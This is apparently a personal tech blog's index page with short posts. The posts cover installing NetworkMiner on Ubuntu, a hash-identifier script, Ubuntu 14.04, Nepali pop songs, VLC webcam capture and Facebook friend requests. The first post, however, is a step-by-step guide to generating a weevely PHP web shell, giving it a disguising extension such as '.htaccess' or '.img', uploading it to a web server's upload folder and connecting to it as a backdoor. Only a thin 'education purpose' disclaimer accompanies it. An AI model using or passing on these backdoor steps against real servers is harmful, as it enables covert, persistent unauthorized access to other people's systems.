Backdooring Server Via Weevely

Weevely is a stealth PHP web shell that simulate an SSH-like connection. It is an essential tool for web application post exploitation, and can be used as stealth backdoor or as a web shell to manage legit web accounts, even free hosted ones. 
You can Download weevely from  : Weevely Download


First run Weevely.

Run the following command  :

python weevely.py generate [PASSWORD]  [location]/filename.php 

For example :

python weevely.py generate nepal123  /home/lamgade/Desktop/uban.php

 ”nepal123″ is my password. “uban.php” is my filename.   You can keep any filename.php. You can keep other extension like “.htaccess” , “.img”

Now “uban.php” is a backdoor.

Once you have generated the backdoor, upload your backdoor in any web server and just use the following command to back connect.

For example i have uploaded backdoor in my localhost. And here is the backdoor location.

http://localhost/wordpress/wp-content/uploads/2014/04/uban.php 

And now my weevely command to back connect will be :

python weevely.py [URL OF THE BACKDOOR] [PASSWORD OF THE BACKDOOR]

python weevely.py http://localhost/wordpress/wpcontent/uploads/2014/04/uban.php nepal123

And when i connect it will give me the backdoor access.

Note : This tutorial is only for education purpose. I am not responsible for any action you do.

Read More

Installing NetworkMiner In Linux

  (Image Logo Ref : http://www.netresec.com/images/NetworkMiner_logo_313x313.png )

NetworkMiner is a Network Forensic Analysis Tool. NetworkMiner can be used as a passive network sniffer/packet capturing tool in order to detect operating systems, sessions, hostnames, open ports etc. without putting any traffic on the network. NetworkMiner can also parse PCAP files for off-line analysis and to regenerate/reassemble transmitted files and certificates from PCAP files.
NetworkMiner collects data (such as forensic evidence) about hosts on the network rather than to collect data regarding the traffic on the network. The main user interface view is host centric (information grouped per host) rather than packet centric (information showed as a list of packets/frames).

In Windows you can install it easily but in Linux its little different. Here's how to install a NetworkMiner in Ubuntu 13.04/13.10



Step 1 : Installing Mono

 sudo apt-get install libmono-winforms2.0-cil


Step 2: Installing NetworkMiner 


wget sourceforge.net/projects/networkminer/files/latest -O /tmp/networkminer.zip

(Above command will download and save the NetworkMiner.zip in /temp/ directory , You can save it to anywhere you like)

sudo unzip /tmp/networkminer.zip -d /opt/

(This command will  unzip and move your saved file to /opt/ directory )

cd /opt/NetworkMiner*
sudo chmod +x NetworkMiner.exe
sudo chmod -R go+w AssembledFiles/
sudo chmod -R go+w Captures/


Step 3 : Running NetworkMiner 

mono NetworkMiner.exe

Read More

Hash Identifier – Identify Your Password Algorithm

Hashing is the method of encrypting our password. Many sites and CMS uses hashing algorithm to encrypt our password. Most popular hashing algorithm is Md5 . There are many type of hashing algorithm like , Md5 , SHA ,MYSQL , Md5 WordPress. Today we will see how to identify our password hashing algorithm.

How to identify these hashing algorithm ?
For that we will be using a hash identifier script written by “Zion3R”( root@blackexploit.com)

When we run the script :

In the above figure , we inputted the hash and it shows the possible hashing algorithm  which is Md5 (WordPress)

Download Link : http://lamgade.me/scripts/Hash_ID_v1.1.py

Read More

Ubuntu 14.04 LTS "Trusty Tahr" Released

Ubuntu Linux version 14.04 LTS ( Long Term Support)  "Trusty Tahr"  has been released which will be focusing on the improvement of  the Ubuntu desktop experience and it may mark a new era in Canonical's relationship with Ubuntu users since it offers some tweaks that many have been asking for since Ubuntu switched to the Unity desktop. 

 Image Credit : Terry Relph-Knight/ZDNet

Ubuntu Official release  :  http://releases.ubuntu.com/14.04/

Read More

Old is Gold – Romantic Nepali Songs Of All Time

Nepali Music is developing. We can see many new comers in the music field. Music is rapidly increasing in our country , we can find new songs , cover , folk songs , pop songs etc everyday on TV , YouTube , Music Channel.

Even Nepali Music had grown up , but still there are many songs which are evergreen for all Nepali Music lovers. Old is Gold. There are some evergreen songs which we listen everytime even they are old. Here are some list of old Nepal POP Songs which are  considered as evergreen songs.

1) Ke Ma Tirmro Sathi Banna Sakchu  - Dipesh Kishor Bhattrai  

2.  Prem Patra -  Anil Singh

3) Timro Joba Lai Dekhera - Mongalian Heart ( Raju Lama)

4)  Herpal - Aastha

6) Mero Auta Sathi Cha- Sugam Pokhrel

7) Sannani - Babu Bogati

8) Au Au Na - Nima Rumba 

 9) Resham - Nepathaya 

Read More

Capturing Webcam From VLC Media Player

VLC Media Player is the most popular multimedia player. VLC media player is a free media player, encoder and steamer that can read from files, CDS, DVDS , network streams, capture cards and even more. VLC uses its internal codecs and work on essentially every popular platform. VLC can read almost every media format. One of the main features of VLC media player is recording webcams. We can record webcams using VLC media player.
Here’s how to capture webcam using VLC media player.

1) Open VLC media player.
2) Go to playlist –> Devices—-> Video Capture

3) Once you start your webcam you can record by clicking on the record button.

Read More

Viewing Our Pending Facebook Friend Request

Facebook is the largest social networking sites. Facebook help us to connect with our friends, family and world. We share our ideas, views, photos, with other people and we "like" and "comment" on other views , photos, status etc. We make lot of friends on Facebook in order to connect with them and for knowing them better. In Facebook, we send friend request to other people and when they accept it , we are friend and we can get their daily activities log in our News Feed. What happens sometimes is we send friend request to many people at a time and if the receiver didn't accept our friend request due to certain circumstances like they don't want to be friend with you, or if they don't like you , or if they are not online for certain period of time then we will have many pending friend request and Facebook will detect it and block your account for sending friend request for certain period of time. How can we manage our friend requests and stop being blocked by Facebook for sending friend request ?

Here is a simple tips for managing our sent Facebook friend request.

Click on this Link :

https://www.facebook.com/friends/requests/?fcref=ff&outgoing=1

When you click on that link then it will display list of people whom you have send friend request and not yet accepted and you can manage it by cancelling the pending request.

And you can cancel the Sent Friend request by clicking on "Cancel Request" .

Read More